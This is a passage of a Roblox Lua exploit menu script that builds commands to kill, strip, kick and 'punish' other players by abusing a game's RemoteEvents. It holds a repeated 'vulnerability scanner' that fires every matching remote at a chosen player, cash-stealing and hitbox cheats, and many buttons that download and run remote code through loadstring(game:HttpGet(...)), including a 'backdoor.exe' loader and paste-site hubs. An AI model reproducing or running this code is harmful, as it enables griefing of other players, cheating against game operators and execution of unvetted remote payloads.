653 | NewPackage.Name = name |
654 | NewPackage.Text = name |
655 | NewPackage.Parent = ScrollingFrame |
656 | NewPackage.MouseButton1Click:Connect(callback) |
657 | end |
658 | |
659 | CreateCMD("kill",function() |
660 | --[[ |
661 | Simple vulnerability scanner v1.1 |
662 | Made by 0fiiz#7952 |
663 | ]]-- |
664 | |
665 | |
666 | local load_BackdoorEXE = false |
667 | local load_SimplySpy = false |
668 | local load_DestroyToolTest = false |
669 | |
670 | if load_SimplySpy == true then |
671 | loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))() |
672 | end |
673 | |
674 | if load_BackdoorEXE == true then |
675 | loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))() |
676 | end |
677 | |
678 | local PingWords = { |
679 | "destroy", |
680 | "delete", |
681 | "del", |
682 | "place", |
683 | "remove", |
684 | "replicate", |
685 | "loadstring", |
686 | "rev", |
687 | "admin", |
688 | "create", |
689 | "property", |
690 | "spawn", |
691 | "clear", |
692 | "trash", |
693 | "fire", |
694 | "bomb", |
695 | "explode", |
696 | "color", |
697 | "update", |
698 | "car", |
699 | "money", |
700 | "cheat", |
701 | "data", |
702 | "save", |
703 | "build", |
704 | "backdoor", |
705 | "invis", |
706 | "hide", |
707 | "set" |
708 | } |
709 | |
710 | local PossibleRemotes = {} |
711 | |
712 | for i,v in pairs(game:GetDescendants()) do |
713 | if v:IsA("RemoteEvent") then |
714 | for x,z in pairs(PingWords) do |
715 | if string.find(v.Name:lower(), z:lower()) then |
716 | warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName) |
717 | table.insert(PossibleRemotes, v) |
718 | end |
719 | end |
720 | end |
721 | end |
722 | |
723 | if load_DestroyToolTest == true then |
724 | for i,v in pairs(PossibleRemotes) do |
725 | v:FireServer(game:GetService("Players")[Player.Value].Character.Head) |
726 | end |
727 | end |
728 | |
729 | if game.PlaceId == 3554069044 then |
730 | game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value].Character.Head, game.JointsService) |
731 | end |
732 | end) |
733 | |
734 | CreateCMD("naked",function() |
735 | if game.PlaceId == 3554069044 then |
736 | game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value].Character.Shirt, game.JointsService) |
737 | game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value].Character.Pants, game.JointsService) |
738 | end |
739 | end) |
740 | |
741 | CreateCMD("dupe head",function() |
742 | --[[ |
743 | Simple vulnerability scanner v1.1 |
744 | Made by 0fiiz#7952 |
745 | ]]-- |
746 | |
747 | |
748 | local load_BackdoorEXE = false |
749 | local load_SimplySpy = false |
750 | local load_DestroyToolTest = true |
751 | |
752 | if load_SimplySpy == true then |
753 | loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))() |
754 | end |
755 | |
756 | if load_BackdoorEXE == true then |
757 | loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))() |
758 | end |
759 | |
760 | local PingWords = { |
761 | "destroy", |
762 | "delete", |
763 | "del", |
764 | "place", |
765 | "remove", |
766 | "replicate", |
767 | "loadstring", |
768 | "rev", |
769 | "admin", |
770 | "create", |
771 | "property", |
772 | "spawn", |
773 | "clear", |
774 | "trash", |
775 | "fire", |
776 | "bomb", |
777 | "explode", |
778 | "color", |
779 | "update", |
780 | "car", |
781 | "money", |
782 | "cheat", |
783 | "data", |
784 | "save", |
785 | "build", |
786 | "backdoor", |
787 | "invis", |
788 | "hide", |
789 | "set" |
790 | } |
791 | |
792 | local PossibleRemotes = {} |
793 | |
794 | for i,v in pairs(game:GetDescendants()) do |
795 | if v:IsA("RemoteEvent") then |
796 | for x,z in pairs(PingWords) do |
797 | if string.find(v.Name:lower(), z:lower()) then |
798 | warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName) |
799 | table.insert(PossibleRemotes, v) |
800 | end |
801 | end |
802 | end |
803 | end |
804 | |
805 | if load_DestroyToolTest == true then |
806 | for i,v in pairs(PossibleRemotes) do |
807 | v:FireServer(game:GetService("Players")[Player.Value].Character.Head) |
808 | end |
809 | end |
810 | end) |
811 | |
812 | CreateCMD("dupe torso",function() |
813 | --[[ |
814 | Simple vulnerability scanner v1.1 |
815 | Made by 0fiiz#7952 |
816 | ]]-- |
817 | |
818 | |
819 | local load_BackdoorEXE = false |
820 | local load_SimplySpy = false |
821 | local load_DestroyToolTest = true |
822 | |
823 | if load_SimplySpy == true then |
824 | loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))() |
825 | end |
826 | |
827 | if load_BackdoorEXE == true then |
828 | loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))() |
829 | end |
830 | |
831 | local PingWords = { |
832 | "destroy", |
833 | "delete", |
834 | "del", |
835 | "place", |
836 | "remove", |
837 | "replicate", |
838 | "loadstring", |
839 | "rev", |
840 | "admin", |
841 | "create", |
842 | "property", |
843 | "spawn", |
844 | "clear", |
845 | "trash", |
846 | "fire", |
847 | "bomb", |
848 | "explode", |
849 | "color", |
850 | "update", |
851 | "car", |
852 | "money", |
853 | "cheat", |
854 | "data", |
855 | "save", |
856 | "build", |
857 | "backdoor", |
858 | "invis", |
859 | "hide", |
860 | "set" |
861 | } |
862 | |
863 | local PossibleRemotes = {} |
864 | |
865 | for i,v in pairs(game:GetDescendants()) do |
866 | if v:IsA("RemoteEvent") then |
867 | for x,z in pairs(PingWords) do |
868 | if string.find(v.Name:lower(), z:lower()) then |
869 | warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName) |
870 | table.insert(PossibleRemotes, v) |
871 | end |
872 | end |
873 | end |
874 | end |
875 | |
876 | if load_DestroyToolTest == true then |
877 | for i,v in pairs(PossibleRemotes) do |
878 | v:FireServer(game:GetService("Players")[Player.Value].Character.Torso) |
879 | end |
880 | end |
881 | end) |
882 | |
883 | CreateCMD("bombhead",function() |
884 | --[[ |
885 | Simple vulnerability scanner v1.1 |
886 | Made by 0fiiz#7952 |
887 | ]]-- |
888 | |
889 | |
890 | local load_BackdoorEXE = false |
891 | local load_SimplySpy = false |
892 | local load_DestroyToolTest = true |
893 | |
894 | if load_SimplySpy == true then |
895 | loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))() |
896 | end |
897 | |
898 | if load_BackdoorEXE == true then |
899 | loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))() |
900 | end |
901 | |
902 | local PingWords = { |
903 | "destroy", |
904 | "delete", |
905 | "del", |
906 | "place", |
907 | "remove", |
908 | "replicate", |
909 | "loadstring", |
910 | "rev", |
911 | "admin", |
912 | "create", |
913 | "property", |
914 | "spawn", |
915 | "clear", |
916 | "trash", |
917 | "fire", |
918 | "bomb", |
919 | "explode", |
920 | "color", |
921 | "update", |
922 | "car", |
923 | "money", |
924 | "cheat", |
925 | "data", |
926 | "save", |
927 | "build", |
928 | "backdoor", |
929 | "invis", |
930 | "hide", |
931 | "set" |
932 | } |
933 | |
934 | local PossibleRemotes = {} |
935 | |
936 | for i,v in pairs(game:GetDescendants()) do |
937 | if v:IsA("RemoteEvent") then |
938 | for x,z in pairs(PingWords) do |
939 | if string.find(v.Name:lower(), z:lower()) then |
940 | warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName) |
941 | table.insert(PossibleRemotes, v) |
942 | end |
943 | end |
944 | end |
945 | end |
946 | |
947 | if load_DestroyToolTest == true then |
948 | for i = 0, 100, 1 do |
949 | for i,v in pairs(PossibleRemotes) do |
950 | v:FireServer(game:GetService("Players")[Player.Value].Character.Head) |
951 | end |
952 | end |
953 | end |
954 | end) |
955 | |
956 | CreateCMD("bombtorso",function() |
957 | --[[ |
958 | Simple vulnerability scanner v1.1 |
959 | Made by 0fiiz#7952 |
960 | ]]-- |
961 | |
962 | |
963 | local load_BackdoorEXE = false |
964 | local load_SimplySpy = false |
965 | local load_DestroyToolTest = true |
966 | |
967 | if load_SimplySpy == true then |
968 | loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))() |
969 | end |
970 | |
971 | if load_BackdoorEXE == true then |
972 | loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))() |
973 | end |
974 | |
975 | local PingWords = { |
976 | "destroy", |
977 | "delete", |
978 | "del", |
979 | "place", |
980 | "remove", |
981 | "replicate", |
982 | "loadstring", |
983 | "rev", |
984 | "admin", |
985 | "create", |
986 | "property", |
987 | "spawn", |
988 | "clear", |
989 | "trash", |
990 | "fire", |
991 | "bomb", |
992 | "explode", |
993 | "color", |
994 | "update", |
995 | "car", |
996 | "money", |
997 | "cheat", |
998 | "data", |
999 | "save", |
1000 | "build", |
1001 | "backdoor", |
1002 | "invis", |
1003 | "hide", |
1004 | "set" |
1005 | } |
1006 | |
1007 | local PossibleRemotes = {} |
1008 | |
1009 | for i,v in pairs(game:GetDescendants()) do |
1010 | if v:IsA("RemoteEvent") then |
1011 | for x,z in pairs(PingWords) do |
1012 | if string.find(v.Name:lower(), z:lower()) then |
1013 | warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName) |
1014 | table.insert(PossibleRemotes, v) |
1015 | end |
1016 | end |
1017 | end |
1018 | end |
1019 | |
1020 | if load_DestroyToolTest == true then |
1021 | for i = 0, 100, 1 do |
1022 | for i,v in pairs(PossibleRemotes) do |
1023 | v:FireServer(game:GetService("Players")[Player.Value].Character.Torso) |
1024 | end |
1025 | end |
1026 | end |
1027 | end) |
1028 | |
1029 | CreateCMD("view",function() |
1030 | game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[Player.Value].Character.Humanoid |
1031 | end) |
1032 | |
1033 | CreateCMD("unview",function() |
1034 | game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character.Humanoid |
1035 | end) |
1036 | |
1037 | CreateCMD("goto",function() |
1038 | game:GetService("Players").LocalPlayer.Character:PivotTo(game:GetService("Players")[Player.Value].Character:GetPivot()) |
1039 | end) |
1040 | |
1041 | CreateCMD("info",function() |
1042 | local plr = game:GetService("Players")[Player.Value] |
1043 | print("--- INFO ---") |
1044 | print("Name: "..plr.Name) |
1045 | print("DisplayName: "..plr.DisplayName) |
1046 | print("Account Age: "..tostring(plr.AccountAge)) |
1047 | print("Membership: "..tostring(plr.MembershipType)) |
1048 | print("--- END. ---") |
1049 | end) |
1050 | |
1051 | CreateScript("RemoteTestTool",function() |
1052 | --[[ |
1053 | Simple vulnerability scanner v1.1 |
1054 | Made by 0fiiz#7952 |
1055 | ]]-- |
1056 | |
1057 | |
1058 | local load_BackdoorEXE = false |
1059 | local load_SimplySpy = false |
1060 | local load_DestroyToolTest = true |
1061 | |
1062 | if load_SimplySpy == true then |
1063 | loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))() |
1064 | end |
1065 | |
1066 | if load_BackdoorEXE == true then |
1067 | loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))() |
1068 | end |
1069 | |
1070 | local PingWords = { |
1071 | "destroy", |
1072 | "delete", |
1073 | "del", |
1074 | "place", |
1075 | "remove", |
1076 | "replicate", |
1077 | "loadstring", |
1078 | "rev", |
1079 | "admin", |
1080 | "create", |
1081 | "property", |
1082 | "spawn", |
1083 | "clear", |
1084 | "trash", |
1085 | "fire", |
1086 | "bomb", |
1087 | "explode", |
1088 | "color", |
1089 | "update", |
1090 | "car", |
1091 | "money", |
1092 | "cheat", |
1093 | "data", |
1094 | "save", |
1095 | "build", |
1096 | "backdoor", |
1097 | "invis", |
1098 | "hide", |
1099 | "set" |
1100 | } |
1101 | |
1102 | local PossibleRemotes = {} |
1103 | |
1104 | for i,v in pairs(game:GetDescendants()) do |
1105 | if v:IsA("RemoteEvent") then |
1106 | for x,z in pairs(PingWords) do |
1107 | if string.find(v.Name:lower(), z:lower()) then |
1108 | warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName) |
1109 | table.insert(PossibleRemotes, v) |
1110 | end |
1111 | end |
1112 | end |
1113 | end |
1114 | |
1115 | if load_DestroyToolTest == true then |
1116 | removething("RTT Tool",game:GetService("Players").LocalPlayer.Backpack) |
1117 | |
1118 | local RemoteTestTool = Instance.new("Tool",game:GetService("Players").LocalPlayer.Backpack) |
1119 | RemoteTestTool.Name = "RTT Tool" |
1120 | RemoteTestTool.RequiresHandle = false |
1121 | RemoteTestTool.Activated:Connect(function() |
1122 | for i,v in pairs(PossibleRemotes) do |
1123 | v:FireServer(game:GetService("Players").LocalPlayer:GetMouse().Target) |
1124 | end |
1125 | end) |
1126 | end |
1127 | end) |
1128 | |
1129 | CreateCMD("kick",function() |
1130 | game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value]) |
1131 | end) |
1132 | |
1133 | CreateCMD("punish",function() |
1134 | game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value].Character) |
1135 | end) |
1136 | |
1137 | Follow = false |
1138 | |
1139 | CreateCMD("annoy",function() |
1140 | local p = game:GetService("Players")[Player.Value] |
1141 | if p.Character and p.Character:FindFirstChild("Humanoid") then |
1142 | if Follow == true then |
1143 | Follow = false; return |
1144 | else Follow = true end |
1145 | while Follow == true do |
1146 | game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = p.Character.HumanoidRootPart.CFrame |
1147 | wait() |
1148 | end |
1149 | end |
1150 | end) |
1151 | |
1152 | CreateCMD("unannoy",function() |
1153 | Follow = false |
1154 | end) |
1155 | |
1156 | CreateScript("Infinite Yield Admin",function() |
1157 | loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))() |
1158 | end) |
1159 | |
1160 | CreateScript("Dex",function() |
1161 | loadstring(game:HttpGet("https://raw.githubusercontent.com/infyiff/backup/main/dex.lua"))() |
1162 | end) |
1163 | |
1164 | CreateScript("Rekt Hub",function() |
1165 | loadstring(game:HttpGet(("https://paste.website/p/fce88396-87e3-4ed8-bb8c-1593ff174d0d.txt"), true))() |
1166 | end) |
1167 | |
1168 | CreateScript("Red All",function() |
1169 | loadstring(game:HttpGet(("https://paste.website/p/a6956ce1-5a86-4da8-887f-5f828b44dd0a.txt"), true))() -- Red all |
1170 | end) |
1171 | |
1172 | CreateScript("HD Admin Brickspam",function() |
1173 | loadstring(game:HttpGet(("https://paste.website/p/fcfa5271-b26f-4611-bea6-9c369dc73546.txt"), true))() -- Hd brickspam |
1174 | end) |
1175 | |
1176 | CreateScript("Bread",function() |
1177 | loadstring(game:HttpGet(("https://paste.website/p/67e65cf2-1afe-4467-b04c-5ec95566807c.txt"), true))() -- bread |
1178 | end) |
1179 | |
1180 | CreateScript("Bat Gui",function() |
1181 | loadstring(game:HttpGet(("https://paste.website/p/cf170836-00b6-480f-b3a4-6170a4ed730f.txt"), true))() -- Bat gui |
1182 | end) |
1183 | |
1184 | CreateScript("Box Admin",function() |
1185 | loadstring(game:HttpGet(("https://paste.website/p/166b9fb0-5ab6-4555-911d-0c7e4af9b608.txt"), true))() -- Box admin |
1186 | end) |
1187 | |
1188 | CreateScript("WeAreSkids",function() |
1189 | loadstring(game:HttpGet(("https://paste.website/p/fb3f5729-dd7b-44af-a145-3badfffb755a.txt"), true))() -- WeAreSkids |
1190 | end) |
1191 | |
1192 | CreateScript("Redwood Ruinier",function() |
1193 | loadstring(game:HttpGet(("https://paste.website/p/aff15b93-2531-4d9b-a62a-1108fd125e24.txt"), true))() -- red wood |
1194 | end) |
1195 | |
1196 | CreateScript("Tycoon Hax",function() |
1197 | loadstring(game:HttpGet(("https://rawscripts.net/raw/Super-Hero-Tycoon-Haxx-9731"), true))() |
1198 | end) |
1199 | |
1200 | CreateScript("ScriptBlox Searcher",function() |
1201 | loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/chillz-workshop/main/ScriptSearcher"))() -- not made by kosovo this time |
1202 | end) |
1203 | |
1204 | CreateScript("Steal Tycoon Cash",function() |
1205 | for f, g in pairs(game:GetService("Workspace"):GetDescendants()) do |
1206 | if g.Name == "Giver" then |
1207 | firetouchinterest(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart, g, 0) |
1208 | firetouchinterest(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart, g, 1) |
1209 | end |
1210 | end |
1211 | end) |
1212 | |
1213 | CreateScript("No Tycoon Doors",function() |
1214 | for f, g in pairs(game:GetService("Workspace"):GetDescendants()) do |
1215 | if g.Name == "Pipe" then |
1216 | g:Destroy() |
1217 | end |
1218 | end |
1219 | end) |
1220 | |
1221 | CreateScript("Delete Roleplay Tool",function() |
1222 | mouse = game:GetService("Players").LocalPlayer:GetMouse() |
1223 | tool = Instance.new("Tool") |
1224 | tool.RequiresHandle = false |
1225 | tool.Name = "Delete tool" |
1226 | tool.Activated:Connect(function() |
1227 | game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(mouse.Target) |
1228 | end) |
1229 | tool.Parent = game.Players.LocalPlayer.Backpack |
1230 | end) |
1231 | |
1232 | CreateScript("Kick Others Roleplay",function() |
1233 | for i,v in pairs(game:GetService("Players"):GetChildren()) do |
1234 | if v:IsA("Player") then |
1235 | if v.Name ~= game:GetService("Players").LocalPlayer.Name then |
1236 | game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(v,nil) |
1237 | end |
1238 | end |
1239 | end |
1240 | end) |
1241 | |
1242 | CreateScript("Punish Others Roleplay",function() |
1243 | for i,v in pairs(game:GetService("Players"):GetChildren()) do |
1244 | if v:IsA("Player") then |
1245 | if v.Name ~= game:GetService("Players").LocalPlayer.Name then |
1246 | game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(v.Character,nil) |
1247 | end |
1248 | end |
1249 | end |
1250 | end) |
1251 | |
1252 | CreateScript("HitBox & Infjump",function() |
1253 | local InfiniteJumpEnabled = true game:GetService("UserInputService").JumpRequest:connect(function() if InfiniteJumpEnabled then game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") end end) |
1254 | game.Players.LocalPlayer.UserId = "2205774994" |
1255 | _G.HeadSize = 20 _G.Disabled = true game:GetService('RunService').RenderStepped:connect(function() if _G.Disabled then for i,v in next, game:GetService('Players'):GetPlayers() do if v.Name ~= game:GetService('Players').LocalPlayer.Name then pcall(function() v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize) v.Character.HumanoidRootPart.Transparency = 0.7 v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Really blue") v.Character.HumanoidRootPart.Material = "Neon" v.Character.HumanoidRootPart.CanCollide = false end) end end end end) |
1256 | end) |
1257 | |
1258 | --// AutomaticBlox |
1259 | local scripts = { |
1260 | ["Google Script Hub"] = game:HttpGet("https://pastebin.com/raw/JcNAaJvZ"), |
1261 | ["Swim Hub"] = game:HttpGet("https://raw.githubusercontent.com/SwimPaste/swimhack/main/swimloader_ui.lua"), |
1262 | ["VHub"] = game:HttpGet("https://raw.githubusercontent.com/Veincx5315/Created/VHub/Simple"), |
1263 | ["Fanmade Synapse Hub"] = game:HttpGet("https://paste.website/p/49cb753f-6618-4e2a-a23d-be5723a5b7b3.txt"), |
1264 | ["ClickTweens"] = game:HttpGet("https://paste.website/p/72bec212-54ea-4050-9d71-a0476981e69f.txt"), |
1265 | ["Erased Admin"] = game:HttpGet("https://paste.website/p/7d6deca7-b380-4bc0-98cb-46695e073fba.txt"), |
1266 | } |
1267 | |
1268 | for i,v in pairs(scripts) do |
1269 | CreateScript(i,function() |
1270 | loadstring(v)() -- not made by kosovo this time |
1271 | end) |
1272 | end |